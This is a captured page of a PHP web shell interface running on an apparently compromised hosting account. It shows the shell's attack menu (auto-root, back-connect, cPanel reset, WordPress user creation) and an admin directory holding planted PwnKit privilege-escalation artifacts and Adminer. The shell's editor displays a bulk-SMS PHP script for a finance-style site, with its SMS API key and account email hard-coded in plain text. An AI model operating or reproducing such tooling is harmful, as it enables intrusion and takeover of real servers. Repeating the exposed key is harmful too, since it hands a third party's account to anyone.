Linux server64.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
LiteSpeed
: 198.54.115.120 | : 216.73.216.96
Cant Read [ /etc/named.conf ]
5.6.40
midwsfoc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
midwsfoc /
public_html /
admin /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
functions
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
scss
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
add_amount.php
1
KB
-rw-r--r--
add_code.php
3.24
KB
-rw-r--r--
add_user.php
15.1
KB
-rw-r--r--
admin_transactions.php
2.17
KB
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
bulksms2.php
1.98
KB
-rw-r--r--
bulksms20.php
8.42
KB
-rw-r--r--
contact_students.php
1.76
KB
-rw-r--r--
db.php
30
B
-rw-r--r--
del_deposit.php
425
B
-rw-r--r--
delete.php
2.66
KB
-rw-r--r--
delete_banner.php
721
B
-rw-r--r--
delete_beneficiary.php
368
B
-rw-r--r--
delete_code.php
371
B
-rw-r--r--
delete_loan.php
355
B
-rw-r--r--
delete_user.php
991
B
-rw-r--r--
edit_banner.php
3.1
KB
-rw-r--r--
edit_transfer.php
3.18
KB
-rw-r--r--
edit_user.php
18.08
KB
-rw-r--r--
editsettings.php
2.54
KB
-rw-r--r--
error_log
160.39
KB
-rw-r--r--
function_users.php
6.17
KB
-rw-r--r--
functions.php
7.15
KB
-rw-r--r--
home.php
4.07
KB
-rw-r--r--
index -.html
41.78
KB
-rw-r--r--
index.php
56
B
-r--r--r--
insert_banners.php
2.84
KB
-rw-r--r--
login.php
1.57
KB
-rw-r--r--
login_admin.php
3.11
KB
-rw-r--r--
logout.php
164
B
-rw-r--r--
member.php
23.81
KB
-rw-r--r--
picupload.php
2.12
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
register_admin.php
8.45
KB
-rw-r--r--
remove_amount.php
1.01
KB
-rw-r--r--
searchmembers.php
2.94
KB
-rw-r--r--
send_email.php
6.9
KB
-rw-r--r--
testimony.php
3.15
KB
-rw-r--r--
transactions.php
2.66
KB
-rw-r--r--
upload_files.php
2.59
KB
-rw-r--r--
user_error.php
188
B
-rw-r--r--
user_transfer.php
6.3
KB
-rw-r--r--
user_withdrawal.php
4.85
KB
-rw-r--r--
view_admin.php
2.84
KB
-rw-r--r--
view_banners.php
2.23
KB
-rw-r--r--
view_beneficiary.php
3.74
KB
-rw-r--r--
view_cards.php
3.03
KB
-rw-r--r--
view_codes.php
3.07
KB
-rw-r--r--
view_loans.php
2.8
KB
-rw-r--r--
view_referrals.php
1.67
KB
-rw-r--r--
view_users.php
4.37
KB
-rw-r--r--
viewconversation.php
5.25
KB
-rw-r--r--
viewmessage.php
2.4
KB
-rw-r--r--
viewmessages.php
3.15
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : bulksms20.php
<?php include("includes/header.php"); include("includes/navbar.php"); $login_date_check = date('M-Y'); ?> <head><title>Bulk SMS</title></head> <div class="content"> <div class="col-md-7"> <div class="box box-solid"> <div class="box-header with-border"> <h3 class="box-title">SEND SMS</h3> </div> <?php $json_url = "http://api.ebulksms.com:8080/sendsms.json"; $xml_url = "http://api.ebulksms.com:8080/sendsms.xml"; $http_get_url = "http://api.ebulksms.com:8080/sendsms"; $username = 'support@midwest-tb.com'; $apikey = '1dcdf3fee0ffee3c4b87672abb4d1581449768a6'; function useJSON($url, $username, $apikey, $flash, $sendername, $messagetext, $recipients) { $gsm = array(); $country_code = '234'; $arr_recipient = explode(',', $recipients); foreach ($arr_recipient as $recipient) { $mobilenumber = trim($recipient); if (substr($mobilenumber, 0, 1) == '0'){ $mobilenumber = $country_code . substr($mobilenumber, 1); } elseif (substr($mobilenumber, 0, 1) == '+'){ $mobilenumber = substr($mobilenumber, 1); } $generated_id = uniqid('int_', false); $generated_id = substr($generated_id, 0, 30); $gsm['gsm'][] = array('msidn' => $mobilenumber, 'msgid' => $generated_id); } $message = array( 'sender' => $sendername, 'messagetext' => $messagetext, 'flash' => "{$flash}", ); $request = array('SMS' => array( 'auth' => array( 'username' => $username, 'apikey' => $apikey ), 'message' => $message, 'recipients' => $gsm )); $json_data = json_encode($request); if ($json_data) { $response = doPostRequest($url, $json_data, array('Content-Type: application/json')); $result = json_decode($response); return $result->response->status; } else { return false; } } function useXML($url, $username, $apikey, $flash, $sendername, $messagetext, $recipients) { $country_code = '234'; $arr_recipient = explode(',', $recipients); $count = count($arr_recipient); $msg_ids = array(); $recipients = ''; $xml = new SimpleXMLElement('<SMS></SMS>'); $auth = $xml->addChild('auth'); $auth->addChild('username', $username); $auth->addChild('apikey', $apikey); $msg = $xml->addChild('message'); $msg->addChild('sender', $sendername); $msg->addChild('messagetext', $messagetext); $msg->addChild('flash', $flash); $rcpt = $xml->addChild('recipients'); for ($i = 0; $i < $count; $i++) { $generated_id = uniqid('int_', false); $generated_id = substr($generated_id, 0, 30); $mobilenumber = trim($arr_recipient[$i]); if (substr($mobilenumber, 0, 1) == '0') { $mobilenumber = $country_code . substr($mobilenumber, 1); } elseif (substr($mobilenumber, 0, 1) == '+') { $mobilenumber = substr($mobilenumber, 1); } $gsm = $rcpt->addChild('gsm'); $gsm->addchild('msidn', $mobilenumber); $gsm->addchild('msgid', $generated_id); } $xmlrequest = $xml->asXML(); if ($xmlrequest) { $result = doPostRequest($url, $xmlrequest, array('Content-Type: application/xml')); $xmlresponse = new SimpleXMLElement($result); return $xmlresponse->status; } return false; } //Function to connect to SMS sending server using HTTP GET function useHTTPGet($url, $username, $apikey, $flash, $sendername, $messagetext, $recipients) { $query_str = http_build_query(array('username' => $username, 'apikey' => $apikey, 'sender' => $sendername, 'messagetext' => $messagetext, 'flash' => $flash, 'recipients' => $recipients)); return file_get_contents("{$url}?{$query_str}"); } //Function to connect to SMS sending server using HTTP POST function doPostRequest($url, $arr_params, $headers = array('Content-Type: application/x-www-form-urlencoded')) { $response = array(); $final_url_data = $arr_params; if (is_array($arr_params)) { $final_url_data = http_build_query($arr_params, '', '&'); } $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POSTFIELDS, $final_url_data); curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_NOSIGNAL, 1); curl_setopt($ch, CURLOPT_VERBOSE, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $response['body'] = curl_exec($ch); $response['code'] = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); return $response['body']; } if (isset($_POST['button'])) { $username = $_POST['username']; $apikey = $_POST['apikey']; $json_url = "http://api.ebulksms.com:8080/sendsms.json"; $xml_url = "http://api.ebulksms.com:8080/sendsms.xml"; $http_get_url = "http://api.ebulksms.com:8080/sendsms"; $username = 'support@midwest-tb.com'; $apikey = '1dcdf3fee0ffee3c4b87672abb4d1581449768a6'; $sendername = substr($_POST['sender_name'], 0, 11); $recipients = $_POST['telephone']; $message = $_POST['message']; $flash = 0; if (get_magic_quotes_gpc()) { $message = stripslashes($_POST['message']); } $message = substr($_POST['message'], 0, 160); #Use the next line for HTTP POST with JSON // $result = useJSON($json_url, $username, $apikey, $flash, $sendername, $message, $recipients); #Uncomment the next line and comment the one above if you want to use HTTP POST with XML //$result = useXML($xml_url, $username, $apikey, $flash, $sendername, $message, $recipients); #Uncomment the next line and comment the ones above if you want to use simple HTTP GET $result = useHTTPGet($http_get_url, $username, $apikey, $flash, $sendername, $message, $recipients); } ?> <!DOCTYPE html> <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>EbulkSMS Send SMS API Sample</title> </head> <body> <h2 style="text-align: center">Ebulk SMS Integration Sample Code</h2> <a href="https://www.ebulksms.com/coverage">See countries you can send sms</a><br/> <a href="https://www.ebulksms.com"> visit www.ebulksms.com to buy units</a><br/><hr/> <div style="border: 1px solid #333; padding: 5px 10px; width: 40%; margin: 0 auto"> <form id="form1" name="form1" method="post" action=""> <?php if (!empty($_POST)) { if ($result == 'SUCCESS') {?> <p style="border: 1px dotted #333; background: #33ff33; padding: 5px;">Message sent</p> <?php } else {?> <p style="border: 1px dotted #333; background: #FFDACC; padding: 5px;">Message not sent - <?php echo $result;?></p> <?php } } ?> <p> <label>Username: <input name="username" type="text" id="username" value="support@midwest-tb.com"/> </label> </p> <p> <label><!--API Key:--> <input name="apikey" type="HIDDEN" id="passwd" value="1dcdf3fee0ffee3c4b87672abb4d1581449768a6"/> </label> </p> <p> <label>Sender name: <input name="sender_name" type="text" id="name" value="CityFinance" /> </label> </p> <p> <label>Recipients <textarea name="telephone" id="telephone" cols="45" rows="2"></textarea> </label> </p> <p> <label>Message <textarea name="message" id="message" cols="45" rows="5"></textarea> </label> </p> <p> <label> <input type="submit" name="button" id="button" value="Submit" /> </label> <label> <input type="reset" name="button2" id="button2" value="Reset" /> </label> </p> </form> </div> </body> </html>
Close